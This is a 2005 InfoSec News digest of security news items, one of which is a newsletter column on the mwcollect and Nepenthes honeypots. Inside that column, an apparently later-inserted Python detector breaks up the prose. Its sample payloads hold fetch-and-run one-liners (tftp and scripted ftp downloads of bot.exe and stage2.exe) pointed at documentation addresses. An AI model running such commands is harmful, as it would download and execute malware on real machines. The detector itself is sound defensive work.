From isn at c4i.org Thu Sep 1 05:16:19 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 1 05:21:27 2005
Subject: [ISN] Security clearance delays still a problem
Message-ID:

http://www.fcw.com/article90542-08-31-05-Web

Florence Olsen
September 1, 2005

Security clearance delays are the same as, if not worse than, a year ago, before lawmakers made changes designed to help clear the backlog, Information Technology Association of America officials said in a survey report released Aug. 31.

Harris Miller, ITAA's president, said newly enacted reciprocity rules have made no dent in a problem that is creating mounting costs for high-tech companies. Those rules permit agencies to accept clearances initiated by other agencies.

ITAA officials said 27 member companies that responded to a survey are coping with the backlog by hiring cleared employees from one another, sometimes paying premiums of up to 25 percent.

Responding to a Web-based survey, 81 percent, or 21 companies, said they had encountered delays of 270 or more days in getting top-secret clearances for employees. Last year, when ITAA conducted a similar survey, 70 percent reported equally lengthy delays. The longest waits occurred in seeking clearances for employees to work at the CIA and the Defense Department.

From isn at c4i.org Thu Sep 1 05:14:45 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 1 05:21:55 2005
Subject: [ISN] Games hackers play
Message-ID:

http://star-techcentral.com/tech/story.asp?file=/2005/9/1/corpit/11909286&sec=corpit

September 1, 2005

HACK In The Box (M) Sdn Bhd (HITB) is organising a two-day hacking competition during this year's HITB Security Conference (HITBSecConf 2005), which will take place from Sept 26-29 at the Westin Hotel, Kuala Lumpur.

Called "Capture The Flag" (CtF), the game originated from Defcon IV (www.defcon.org) in 1996, the largest underground hacking convention in the world.
In the competition, each participating team (consisting of 2-3 persons) will be given a server to defend, and at the same time, they will launch penetrative attacks against other teams.

"The competition tests a security administrator's ability to secure complex systems with unknown but required functionalities," said Meling Mudin, HITB senior security consultant.

"The emphasis of the CtF game is on real-world skills and not just purebred hacking skills," he said. This includes analysing the security posture of a system, finding and exploiting vulnerabilities, writing automated scripts, and keeping a running system alive while under massive attack, he explained.

HITBSecConf is a non-profit, homegrown hacking and network security conference, and features hackers from Australia, Canada, Europe, the United States and Asia Pacific. Malaysia Airlines is the Official Airline Partner for this year's conference.

According to Dhillon Andrew Kannabhiran, its founder and HITB chief executive officer, all participants in the CtF game are professional security consultants whose clients include banks and government bodies.

"Participating in a CtF game is one of the best ways they can pit their skills against other hackers in a controlled environment," he said.

"In previous years, we had participants from Brunei, Singapore and Malaysia," he said, adding that the winning team this year will walk away with a Mac Mini and other prizes.

While the CtF is a team-based competition, solo hackers may participate in the Zone-H Hacking Challenge, also held during the HITBSecConf 2005. This challenge is an online hack game where participants are required to overcome three levels of increasing difficulty in a limited time using only a web browser.
For more information and to sign up for HITBSecConf 2005, go to http://conference.hackinthebox.org

From isn at c4i.org Thu Sep 1 05:14:58 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 1 05:22:27 2005
Subject: [ISN] Hackers Declare Open Season on Korean Institutions
Message-ID:

http://english.chosun.com/w21data/html/news/200508/200508310029.html

Aug. 31, 2005

When the website of a local Education Office was hacked in January, the hacker, who went in through a Chinese website, got hold of the phone numbers, IDs and PIN numbers of hundreds of members, and using them was able to take a peek at their e-mails. Posing as the website administrator, the hacker played havoc with the site, changing it as he pleased. The National Intelligence Service and National Cyber Security Center discovered that the man had hacked into some 170 local and foreign websites over a single year.

Educational institutions are the preferred target of hackers, making up 52 percent of the 2,951 websites damaged in the first half of the year, according to government materials.

Authorities are not saying whether any of the sites hacked this year are security-related, but last year 211 PCs at the Korea Institute for Defense Analyses, National Maritime Police Agency and Korea Atomic Energy Research Institute were accessed by persons unknown. Some of the terminals had defense secrets stored on them. Attempts to track down the culprits revealed that the hackers were very likely Chinese, but because of potential diplomatic consequences the government took no particular measures.

Investigation shows that the computers of Korean public institutions are being hacked almost indiscriminately. This year's 2,951 cyber-violations of public institutions were twice the total over the same period last year (1,482), and 74 percent of last year's total of 3,970 incidents. Last year's total in turn was triple the number of 2003.
National bodies, local governments, research institutes, educational institutions, government affiliates -- they are all increasingly fair game for hackers.

An official with the Korea Information Security Agency says most incidents are perpetrated by skilled hackers through several avenues, "and because investigative cooperation with states like China is not working properly, there are many cases where catching the hackers is impossible." The result is that authorities can only guess what information hackers got away with, he adds.

From isn at c4i.org Thu Sep 1 05:16:51 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 1 05:23:52 2005
Subject: [ISN] New Microsoft portal will help cops
Message-ID:

http://news.com.com/New+Microsoft+portal+will+help+cops/2100-7348_3-5845205.html

By Joris Evers
Staff Writer, CNET News.com
August 31, 2005

MONTEREY, Calif. -- Expanding its efforts to help law enforcement with cybercrime investigations, Microsoft plans in the coming months to launch a new online resource.

The Web site will include training, tips and tools for investigations and information on cybercrime, Richard LaMagna, director of worldwide law enforcement programs at Microsoft, said in an interview with CNET News.com on Wednesday at the annual High Technology Crime Investigation Association event here.

"We want to help law enforcement develop the capability to deal with these cybercrime problems," said LaMagna, a former federal agent. "We believe it is important for private industry to support law enforcement, particularly with cybercrime. It is not the kind of thing the FBI, NYPD or customs agents can do on their own."

Microsoft's online training will include simple forensic skills--for example, guidance on digging up information on the hard drive of a seized Windows PC, and basic online investigation techniques such as trace routes and Whois domain database lookups, LaMagna said.
"There are still a lot of law enforcement people out there who don't know how to trace an IP address or an Internet domain," he said.

Other information on the Web site will include details on recent legislation. Microsoft also plans to offer specialized technical support to investigators.

Microsoft already is active in helping law enforcement. For example, the company has hosted two multiday training sessions on botnets in the past year, one in the United States and one in Europe. A third session is scheduled for October at Microsoft's Redmond, Wash., campus, LaMagna said.

Botnets are networks of hijacked computers that are typically used for criminal activity. Criminals have used botnets for sending spam, spreading malicious code, launching denial-of-service attacks and extortion attempts, according to security experts. Microsoft's new portal will offer a software tool to help detect botnets, LaMagna said.

The "Law Enforcement Portal" also will have contact details for people within Microsoft who deal with requests from the authorities, LaMagna said. These could be requests for information on Hotmail users, for example, he said.

Educating law enforcement is only part of Microsoft's efforts to fight cybercrime. The company also has its own team of about 50 investigators. Intelligence gathered by this "Internet Safety Enforcement" group has helped track down the suspected creators of the recent Zotob worm, among other cybercriminals. Microsoft also is active in fighting spammers in court. And it introduced a computer system designed to let police agencies share information for tracking online child predators.

The new Law Enforcement Portal should be online by November, LaMagna said. The site will initially be in English only, but there are plans to translate it into other languages. Access will be limited to law enforcement officials.
From isn at c4i.org Thu Sep 1 05:17:06 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 1 05:24:18 2005
Subject: [ISN] Expert charged in computer hacking
Message-ID:

http://pittsburghlive.com/x/tribune-review/trib/pittsburgh/s_369618.html

By Violet Law
TRIBUNE-REVIEW
September 1, 2005

A computer networking consultant hacked into a Beaver County school district's system to peek at a competitor's bids, but didn't escape without leaving tracks, police said Wednesday.

Police charged Brooks M. Roy, 25, of Cranberry, with breaking into the e-mail system he helped design and install for the South Side Beaver School District. Roy admitted to police that he hacked into the system from his home computer, retrieving confidential bids filed by a competitor, according to court documents.

Roy worked on the district's system for Communications Consulting Inc., a New Sewickley, Beaver County, information technology firm. He was still with the company at the time of the break-in, and still had a voice mail account in the firm's phone system yesterday.

According to court records: The district's technology coordinator, Thomas Sherry, discovered in May that someone had logged into the district's e-mail server and accessed his e-mail without authorization. Police said they tracked Roy down using his IP address, a numeric address given to a computer connected to the Internet.

Attempts to contact Roy, Communications Consulting and school officials were unsuccessful.

Roy does computer work for more than one district, but authorities were not aware of his hacking into other schools' systems, said state police Cpl. John Stephansky, who investigated the case. Police rely on reports from people such as Sherry to track down computer crimes, he said.

Ambridge School District technology director James LaSalle praised both Roy's work and his ethics. LaSalle said he has known Roy for about eight years, and contracted with Communications Consulting for data and voice networking.
"I think his ethics and his professional conduct are beyond reproach. He's top shelf," LaSalle said. "I have no reason to question their service or integrity."

Communications Consulting's Web site says the company "specializes in the design, sales and service of communications systems for data, voice and video networks."

Roy was arraigned yesterday before Cranberry District Judge Kelly Streib and released on his own recognizance. He is charged with computer trespass, criminal use of a communication facility and unlawful use of computers.

From isn at c4i.org Thu Sep 1 05:15:51 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 1 05:24:53 2005
Subject: [ISN] Security UPDATE -- Honeypots That Collect Malware -- August 31, 2005
Message-ID:

====================

This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE.

A Robust Combination from Symantec
http://list.windowsitpro.com/t?ctl=12651:4FB69

How to solve the anti-spam dilemma
http://list.windowsitpro.com/t?ctl=1263A:4FB69

====================

1. In Focus: Honeypots That Collect Malware

2. Security News and Features
- Recent Security Vulnerabilities
- Vulnerabilities in PHP-based Libraries
- Secure Computing to Acquire CyberGuard
- EarthLink to Acquire Security Solutions Maker Aluria Software

3. Security Toolkit
- Security Matters Blog
- FAQ

4. New and Improved
- Pocket PC File Encryption

====================

==== Sponsor: Symantec ====

A Robust Combination from Symantec
Staying on top of today's vulnerabilities and threats is one of the most difficult, time-consuming, and even risky tasks facing IT professionals like you. Never has it been so important to proactively manage your IT environment. Fortunately, Symantec can help.
Symantec LiveState Patch Manager 6.0 helps keep your enterprise devices secure and available by identifying known vulnerabilities and then installing necessary patches on hundreds of systems in minutes, not hours. That includes mobile and remote devices, too. For extra protection from threats that even the latest patches can't address, there's Symantec Client Security 3.0. With its exclusive intrusion prevention technology, Symantec Client Security 3.0 proactively protects systems against known and unknown exploits before they can compromise your system, including spyware, adware, viruses, and other malicious intrusions. Learn more at
http://list.windowsitpro.com/t?ctl=12651:4FB69

====================

==== 1. In Focus: Honeypots That Collect Malware ====
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

The last two weeks, I've written about proactive honeypots that seek out malicious Web sites, two of which are unavailable to the public and one that you can download to run on your own networks. If you missed either of those articles, they're available on our Web site at the URLs below. This week, I'll discuss two "passive" honeypots--that is, honeypots that sit waiting for intrusion attempts.
http://list.windowsitpro.com/t?ctl=1264A:4FB69
http://list.windowsitpro.com/t?ctl=12649:4FB69

Because honeypots present an attack point for potential intruders, they're useful in determining what sort of intrusion attempts are being launched against your network. In some cases, they can detect intrusion methods that are completely unknown to even the most up-to-date Intrusion Detection Systems (IDSs).

I recently learned about two new honeypots. The first is mwcollect (at the URL below), which was released in April 2005 and is partially funded by The Honeynet Project. Mwcollect is designed specifically to collect malware--thus the "mw" prefix in the mwcollect name.
The tool runs on Linux and OpenBSD and can also run on Cygwin, a Linux environment that runs on Windows platforms.
http://list.windowsitpro.com/t?ctl=12653:4FB69

Mwcollect is a little different from typical honeypots because it was originally designed to collect bot software, but the current version collects worms and other forms of malware that take advantage of vulnerabilities that mwcollect exposes. According to the mwcollect Web site, systems that run the tool can't be infected with malware due to the way mwcollect operates internally. It binds to specified ports, waits for an exploit attempt, scans for shell code, and tries to download any related malware. Captured malware can then be added to a database at the mwcollect Web site.

The next version of mwcollect will allow three levels of network interactivity. The first level is the same as I describe above. The second level will passively analyze network traffic (like a sniffer in promiscuous mode would) and will try to download any related malware. The third or lowest level of interactivity will also passively analyze network traffic but won't try to download related malware. You can learn a little more about the tool at the Web site, and join in an Internet Relay Chat (IRC) for further discussion.

The second new honeypot, Nepenthes, was released earlier this month and is similar to mwcollect. It too presents known vulnerabilities to the network and waits for intrusion attempts. Current modules for Nepenthes allow it to emulate problems with DCOM, Local Security Authority Service (LSASS), WINS, ASN1, NetBIOS, SQL Server, and a lot more Microsoft services. Because Nepenthes runs on Linux systems, none of those services would actually be available, which means exploits against them would have little or no effect on the underlying OS. Just like mwcollect, when Nepenthes detects intrusion attempts, it tries to download any related malware through a variety of methods including FTP, Trivial FTP (TFTP), and HTTP.
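The "scan the captured shell code for a download instruction" step that both mwcollect and Nepenthes rely on, as an added illustration (this is not code from either tool): given the bytes a passive honeypot received on a listening port, recognise HTTP, FTP and TFTP fetch instructions and produce the record a collector would log, without executing the payload or fetching anything. The regular expressions, the sample payloads and the RFC 5737 documentation addresses in them are assumptions constructed for this example.

```python
"""Recognise second-stage download instructions in captured exploit payloads.

Added illustration (not mwcollect or Nepenthes code) of the step the column
describes: a passive honeypot records an exploit attempt, then looks through
the payload for instructions that fetch a file over HTTP, FTP or TFTP. This
code only recognises and logs such instructions; it never executes the
payload and never downloads anything.
"""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class FetchInstruction:
    method: str    # "http", "ftp" or "tftp"
    host: str      # where the second stage would be fetched from
    resource: str  # URL path or file name requested


# Plain URLs, as used by HTTP- and FTP-fetching droppers.
_URL_RE = re.compile(
    rb"(?P<scheme>https?|ftp)://(?P<host>[A-Za-z0-9.\-]+)(?::\d+)?"
    rb"(?P<path>/[^\s\"'<>]*)?",
    re.IGNORECASE,
)
# Windows "tftp -i <host> GET <file>" one-liners.
_TFTP_RE = re.compile(
    rb"tftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>[A-Za-z0-9.\-]+)\s+get\s+(?P<file>\S+)",
    re.IGNORECASE,
)
# Scripted ftp.exe sessions: "open <host> [port] ... get <file>".
_FTP_SCRIPT_RE = re.compile(
    rb"open\s+(?P<host>[A-Za-z0-9.\-]+)(?:\s+\d+)?.*?\bget\s+(?P<file>\S+)",
    re.IGNORECASE | re.DOTALL,
)


def _text(raw: Optional[bytes]) -> str:
    """Decode a matched fragment leniently; shellcode is not clean ASCII."""
    return (raw or b"").decode("ascii", "replace")


def extract_fetch_instructions(payload: bytes) -> List[FetchInstruction]:
    """Return every distinct download instruction found in the payload, in order."""
    found: List[FetchInstruction] = []
    for m in _URL_RE.finditer(payload):
        scheme = _text(m.group("scheme")).lower()
        method = "http" if scheme.startswith("http") else "ftp"
        found.append(FetchInstruction(method, _text(m.group("host")),
                                      _text(m.group("path")) or "/"))
    for m in _TFTP_RE.finditer(payload):
        found.append(FetchInstruction("tftp", _text(m.group("host")), _text(m.group("file"))))
    for m in _FTP_SCRIPT_RE.finditer(payload):
        found.append(FetchInstruction("ftp", _text(m.group("host")), _text(m.group("file"))))
    return list(dict.fromkeys(found))  # de-duplicate, keep first-seen order


def triage_capture(port: int, payload: bytes) -> dict:
    """Build the record a collector would log for one captured attempt."""
    instructions = extract_fetch_instructions(payload)
    return {
        "port": port,
        "bytes": len(payload),
        "fetch_instructions": instructions,
        "verdict": ("second-stage download requested" if instructions
                    else "no download instruction found"),
    }


# Constructed sample captures (port, payload). Hosts are RFC 5737 documentation
# addresses, so nothing here points at real infrastructure.
SAMPLE_CAPTURES = [
    (445, b"\x90" * 16 + b"cmd /c tftp -i 192.0.2.10 GET bot.exe bot.exe & bot.exe"),
    (135, b"echo open 198.51.100.5 21 > i & echo user a a >> i & "
          b"echo get stage2.exe >> i & ftp -n -s:i"),
    (1433, b"\x31\xc0 http://203.0.113.7:8080/dl/x.php?id=1 \x00"),
    (80, b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"),  # ordinary request, no fetch
]


if __name__ == "__main__":
    for port, payload in SAMPLE_CAPTURES:
        record = triage_capture(port, payload)
        print(f"port {record['port']:>5}: {record['verdict']}")
        for instr in record["fetch_instructions"]:
            print(f"    {instr.method:<4} host={instr.host} resource={instr.resource}")
```

In a real collector the logged host and resource would be handed to a sandboxed, rate-limited fetcher and the sample hashed and stored; the recogniser above is the part that decides whether there is anything to fetch at all.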
Captured malware is then sent to a central server hosted by the developers of the tool.
http://list.windowsitpro.com/t?ctl=12652:4FB69

Documentation for Nepenthes doesn't explain what goes on under the hood. But as best I can determine (I haven't actually installed the tool yet), it captures shell-code exploits; looks for instructions that try to download code from the Internet (which many types of malware have); and if it finds such instructions, proceeds to try to download the malware in accordance with the intruder's intent--for example, if the captured code indicates that the system should use FTP to download a file, Nepenthes will try to do that. I suspect that mwcollect works in a similar fashion.

Nepenthes doesn't appear to run on Windows platforms using Cygwin, so you'll probably need a Linux-based system to put it to use on your networks.

If you use honeypots, as so many administrators do these days, be sure to take a closer look at mwcollect and Nepenthes.

-----

We need your help! Windows IT Pro is launching its second Windows IT Pro Industry Salary Survey, and we want to find out all about you and what makes you a satisfied IT pro. When you complete the survey (about 10 minutes of your time), you'll be entered in a drawing for one of two $300 American Express gift certificates. Look for the survey results--and see how you stack up against your peers--in our December issue. To take the survey, go to
http://list.windowsitpro.com/t?ctl=12646:4FB69

====================

==== Sponsor: Postini ====

How to solve the anti-spam dilemma
In this free white paper learn why older spam prevention technologies using traditional content filtering don't work against the latest spammer tactics - and why more corporate email administrators are turning to a more accurate, more effective approach: managed email security service. Find out how to achieve email security dynamically with multiple layer protection ... minimize false positives ...
cut email administration costs (and hassles) ... and keep user communities happy and productive. Download your free copy now.
http://list.windowsitpro.com/t?ctl=1263A:4FB69

====================

==== 2. Security News and Features ====

Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at
http://list.windowsitpro.com/t?ctl=12641:4FB69

Vulnerabilities in PHP-based Libraries
Major security problems in two popular Hypertext Preprocessor (PHP)-based libraries have led to complete removal of a particular programming function in those libraries. In June, problems were discovered in libraries that provide PHP-based support for XML and RPC, both of which are used by many applications today, including hugely popular blog software packages. A subsequent code audit revealed still more vulnerabilities.
http://list.windowsitpro.com/t?ctl=12647:4FB69

Secure Computing to Acquire CyberGuard
Secure Computing announced that it will acquire CyberGuard. Under the terms of the deal, Secure Computing will acquire all outstanding shares of CyberGuard common stock and in turn give shares of its common stock, as well as cash, to CyberGuard stockholders.
http://list.windowsitpro.com/t?ctl=1264C:4FB69

EarthLink to Acquire Security Solutions Maker Aluria Software
EarthLink and Aluria Software announced a deal in which EarthLink will acquire the assets of Aluria, makers of the Spyware Eliminator software. Terms of the deal, expected to close in September, weren't announced.
http://list.windowsitpro.com/t?ctl=1264D:4FB69

====================

==== Resources and Events ====

SQL Server 2005 Roadshow Is Coming to a City Near You
Get the facts about migrating to SQL Server 2005.
SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database computing environment. Attend and receive a 1-year membership to PASS and 1-year subscription to SQL Server Magazine. Register now!
http://list.windowsitpro.com/t?ctl=1263F:4FB69

Consolidate Your SQL Server Infrastructure
Shared data clustering is the breakthrough consolidation solution for Microsoft Windows servers. In this free Web seminar, learn how shared data clustering technology can reduce capital expenditures by at least 50 percent, improve management efficiency, reduce operational expense, ensure high availability across all SQL Server instances, and more! Find out how you can reduce the overall Total Cost of Ownership (TCO) for SQL Server cluster deployments by as much as 60 percent over three years! Sign up today!
http://list.windowsitpro.com/t?ctl=1263B:4FB69

High Risk Internet Access: Are You in Control?
Defending against Internet criminals, spyware, and phishing and addressing the points of risk that Internet-enabled applications expose your organization to can seem like an epic battle with Medusa. So how do you take control of these valuable resources? In this free Web seminar, you'll get the tools you need to help you analyze the impact Internet-based threats have on your organization and tools to aid you in the construction of Acceptable-Use Policies (AUPs).
http://list.windowsitpro.com/t?ctl=1263E:4FB69

Get Ready for SQL Server 2005 Roadshow in Europe
Back by popular demand--Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a 1-year membership to PASS and 1-year subscription to SQL Server Magazine.
Register now!
http://list.windowsitpro.com/t?ctl=1263D:4FB69

Discover SQL Server 2005 for the enterprise. Are you prepared?
In this free, half-day event, you'll learn how the top new features of SQL Server 2005 will help you create and manage large-scale, mission-critical, enterprise database applications--making your job easier. Find out how to leverage SQL Server 2005's new capabilities to best support your business initiatives. Register today!
http://list.windowsitpro.com/t?ctl=12640:4FB69

All high availability solutions are not created equal--how does yours measure up?
In this free Web seminar, you'll get the tools you need to ensure your systems aren't going down. You'll discover the various categories of high availability and disaster recovery solutions available and the pros and cons of each. You'll learn what solutions help you take preemptive, corrective action without resorting to a full system failover, or in extreme cases, that perform a nondisruptive, automatic switchover to a secondary server.
http://list.windowsitpro.com/t?ctl=1263C:4FB69

====================

==== Featured White Paper ====

The Impact of Disk Defragmentation
Nearly every IT professional has a fragmentation horror story--in which fragmentation severely degraded performance so that systems were unusable. In this free white paper, learn what impact fragmentation has on users and system activities and discover how quickly fragmentation accumulates as a result of these activities. Plus get the recommendations you need to manage the frequency of defragmentation across your infrastructure.
http://list.windowsitpro.com/t?ctl=12639:4FB69

====================

==== 3. Security Toolkit ====

Security Matters Blog: Wi-Fi Security Is Better Than I Expected
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=1264F:4FB69

There's a lot of talk about the need for increased Wi-Fi security. I was surprised at what I found when I did a little "war driving" in my area.
http://list.windowsitpro.com/t?ctl=12648:4FB69

FAQ
by John Savill, http://list.windowsitpro.com/t?ctl=1264E:4FB69

Q: I created a custom .adm file and imported it into a Group Policy Object's (GPO's) Administrative Templates. Why can't I see any of the settings in Group Policy Editor (GPE)?

Find the answer at
http://list.windowsitpro.com/t?ctl=1264B:4FB69

====================

==== Announcements ====
(from Windows IT Pro and its partners)

Stay Up-To-Date with the Windows IT Security Newsletter
Each new issue of the Windows IT Security newsletter features related product coverage of the best security tools available and expert advice on the best way to implement various security components. We've also expanded our security content to include even more fundamentals on building and maintaining a secure enterprise. In addition, paid subscribers get online access to our entire online security article database (over 1900 articles)! Subscribe today:
http://list.windowsitpro.com/t?ctl=12643:4FB69

VIP Monthly Online Pass = Quick Security Answers!
Sign up today for your VIP Monthly Online Pass and get 24/7 access to the entire online article database, including exclusive, subscriber-only Windows IT Security newsletter content. That's a database of over 1900 security articles to help you get all the answers you need, when you need them. Sign up now:
http://list.windowsitpro.com/t?ctl=12644:4FB69

====================

==== 4. New and Improved ====
by Renee Munshi, products@windowsitpro.com

Pocket PC File Encryption
Infotecs offers ViPNet Safe Disk for Pocket PC, which encrypts and password-protects sensitive files on PDAs. Data is protected even when the device is switched off or in standby mode. You can open and edit any file from a secure folder in a word processor or database program--the file is automatically decrypted when opened and encrypted when saved.
ViPNet Safe Disk for Pocket PC supports two 256-bit encryption algorithms: Advanced Encryption Standard (AES) and Government Standard (GOST). The interface is specially designed to help PDA users manage protected files and folders with just a few taps. You can exchange protected data with a PC that's running ViPNet Safe Disk. ViPNet Safe Disk for Pocket PC runs under Windows Mobile 2003 and costs $26.40 for a single-user license. For more information, go to
http://list.windowsitpro.com/t?ctl=12654:4FB69

Tell Us About a Hot Product and Get a T-Shirt!
Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to whatshot@windowsitpro.com.

Editor's note: Share Your Security Discoveries and Get $100
Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column. Email your contributions (500 words or less) to r2rwinitsec@windowsitpro.com. If we print your submission, you'll get $100. We edit submissions for style, grammar, and length.

====================

==== Sponsored Links ====

Professional and secure remote control from all major platforms
http://list.windowsitpro.com/t?ctl=12637:4FB69

Argent Versus MOM 2005
Experts Pick the Best Windows Monitoring Solution
http://list.windowsitpro.com/t?ctl=12636:4FB69

Tech jobs at Dice
Search 65K+ new IT jobs daily--Tech expert jobs at top companies!
http://list.windowsitpro.com/t?ctl=12638:4FB69

====================

==== Contact Us ====

About the newsletter -- letters@windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=12650:4FB69
About product news -- products@windowsitpro.com
About your subscription -- windowsitproupdate@windowsitpro.com
About sponsoring Security UPDATE -- salesopps@windowsitpro.com

====================

This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today.
http://list.windowsitpro.com/t?ctl=12645:4FB69

View the Windows IT Pro privacy policy at
http://www.windowsitpro.com/AboutUs/Index.cfm?action=privacy

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2005, Penton Media, Inc. All rights reserved.

From isn at c4i.org Thu Sep 1 05:16:07 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 1 05:27:53 2005
Subject: [ISN] Amid Katrina chaos, one company struggles to keep going
Message-ID:

http://www.computerworld.com/securitytopics/security/recovery/story/0,10801,104291,00.html

By Marc L. Songini
AUGUST 31, 2005
COMPUTERWORLD

As floodwaters continued to flow into New Orleans today and officials in the Gulf states predicted a death toll from Hurricane Katrina that could reach into the thousands, companies that were forced to evacuate by the storm struggled to get their operations up and running elsewhere.

Among those scrambling to stay in business is Integrated Data Systems Inc., a New Orleans-based integrator and hosting services provider.

"I don't think anyone has ever coped with anything like this before. The magnitude is pretty enormous," said Robert Leithman, president of Integrated Data Systems.
Leithman -- who left the city along with most of its residents ahead of the storm -- said by cell phone that he and his staff are in the process of getting his customers back online.

The 18-person company, which has backup facilities in several cities in the U.S., now has basic Web access, instant messaging and Hotmail e-mail capabilities and is looking to get the back-office systems of its customers live. Among those companies is New Orleans-based Tabasco sauce maker McIlhenny Co., for which Integrated Data Systems set up a temporary Web site for customers and e-mail access for employees.

"We've got them ripping along right now," Leithman said today. "Things are far from being back to normal, but at least we're getting the semblance of it."

The main problem for companies in the region is that connectivity and telecommunications are down. "Even with a good plan, which we had, there were still some things we didn't expect, [such as] the lack of the ability to communicate."

After Katrina hit the Louisiana, Mississippi and Alabama coasts on Monday, communications virtually ceased. While some cell phone users were able to make outgoing calls, they couldn't receive calls. That forced company employees to buy prepaid cell phone cards for incoming messages.

Even before the storm approached, Integrated Data Systems had disaster recovery plans in place, with procedures based on lessons learned after the Sept. 11, 2001, terrorist attacks. Among those lessons: Make sure company assets and hardware are distributed geographically. The 9/11 attacks taught the company, for instance, to have its backup tapes located in different places, Leithman said.

"This was not as shocking [as 9/11], but it's a lot larger in scope and size," he said.

One of the company's hosting centers -- near the stricken New Orleans Superdome, where refugees took shelter from the hurricane -- is inaccessible.
Another, located in a bunker in nearby Metairie, La., is live -- but still lacks connectivity, said Leithman. He plans to have it checked on, but to communicate via phone requires driving miles away to get a line.

"Even the best-laid plans go awry really quick," said Leithman, who had to leave for Florida on Saturday. The trip, which normally takes about five hours, took 15 as residents of the area fled the approaching storm.

Not everyone at Integrated Data Systems was able to get far enough away from the storm. Leithman noted that one company engineer, who thought he was safe in a location that would be "high and dry," had his roof ripped off.

"The most interesting thing about the process is [that] first, people are in shock," said Leithman. "Their houses are gone, their lives torn up, and they're worried about their families and things they should be worried about. Then they come out and say, 'I have to have a job, and what do I do?' We're able to help them. In the meantime, we're not thinking of ourselves. It's helpful not to have time to think about it."

And even as people struggle to come to grips with what has happened in and around New Orleans, Leithman said he is already looking ahead -- trying to learn the lessons from the ongoing disaster. Next time, for instance, he said he plans to buy satellite phones to ensure that communications remain in place. During an earlier hurricane, Integrated Data Systems had rented satellite phones at the last minute. Katrina didn't give the company time to get them. "I promise to own them next time around. They'll be in our possession," he said.

Elsewhere in the region, companies such as Harrah's Entertainment Inc., which had three casinos in the region -- one in New Orleans, one in Biloxi, Miss., and one in Gulfport, Miss. -- shut down operations last weekend.
In doing so, the Las Vegas-based gaming company moved processing for several key systems from a regional data center in Biloxi to primary data centers in Tennessee and New Jersey, said Tim Stanley, senior vice president and CIO at Harrah's.

Systems that were rerouted include hotel, casino, events, ticketing and convention systems, reservations and VIP call centers, the IT help desk, regional data and file servers, e-mail servers, and some network and routing infrastructure, said Stanley. Back-office operations such as finance and human resources were already centralized in New Jersey or in Nevada.

The company also has a variety of systems located at the affected properties that can't be operated remotely, including slot and table game systems, sports books, point-of-sale systems, local telephony, security and desktop systems -- "not that those really matter, as the properties are not open," said Stanley. He added that they aren't expected to reopen "for some time."

Tom Hoffman contributed to this report.

From isn at c4i.org Thu Sep 1 05:16:37 2005
From: isn at c4i.org (InfoSec News)
Date: Thu Sep 1 05:28:18 2005
Subject: [ISN] The truth about security
Message-ID:

http://www.globetechnology.com/servlet/story/RTGAM.20050826.gtkirwanaug26/BNStory/Technology/

By MARY KIRWAN
August 31, 2005
Special to Globe and Mail Update

Mutton dressed as lamb? Are software products riddled with holes? Truth is often stranger than fiction, and never more so than in the world of IT security.

The recent BlackHat security event in Las Vegas was a case in point, becoming the stage for a bizarre series of events. Bemused attendees watched as Cisco and Internet Security Systems Inc. (ISS) tried to stop Michael Lynn, an ISS employee, from giving his scheduled talk on critical vulnerabilities in Cisco routers. Routers move data around the Internet, and Cisco owns the market for them.
It has generally been assumed, naively so, that they are impervious to attack, so news that they are not is very bad news indeed. These less than glad tidings, however dispiriting, would rarely qualify as front page news. But Cisco and ISS demurred. They secured an injunction to prevent Lynn from giving his talk, and his presentation was ripped from conference binders. The newly martyred Lynn duly quit his job at ISS, sallied forth and delivered his speech anyway, causing a veritable ruckus. The entire affair was quickly dubbed 'Ciscogate', and made news around the world.

It also drew attention to a disquieting global trend that is gathering momentum. Software vendors are using copyright and trade secret laws to prevent researchers from revealing critical flaws in software products.

For instance, in March 2005, Guillaume Tena, a French researcher in molecular biology in the department of Genetics at Harvard University, received a hefty fine from a French court and narrowly escaped jail time for revealing flaws in a Tegam International anti-virus product that was advertised as being capable of detecting and stopping "100 per cent of viruses." He was prosecuted under the French Intellectual Property Code for counterfeiting. Tegam also seeks damages of 900,000 euros in a civil lawsuit; it considers Tena a software 'pirate' who defamed the company.

But does muzzling security researchers improve software quality and security? Or, as software vendors have no liability to customers for flaws, will such action simply serve to hide a festering problem under a rather large bushel?

Politicians mandated with protecting us and the global economy in dangerous times ought to take note. As more than 85 per cent of "critical infrastructure" (a phrase used to refer to critical sectors, such as telecommunication providers, utilities, and the financial services sector) is in private industry's hands and hugely dependent on technology, more needs to be done to ensure its survivability.
Vendors argue that researchers who expose software flaws are often less than pure of heart; that they threaten and cajole them to get publicity and lucrative contracts. Vendors also maintain that developing and testing patches takes time, and that customers expect researchers to give vendors time to address problems before releasing exploit code into the wild.

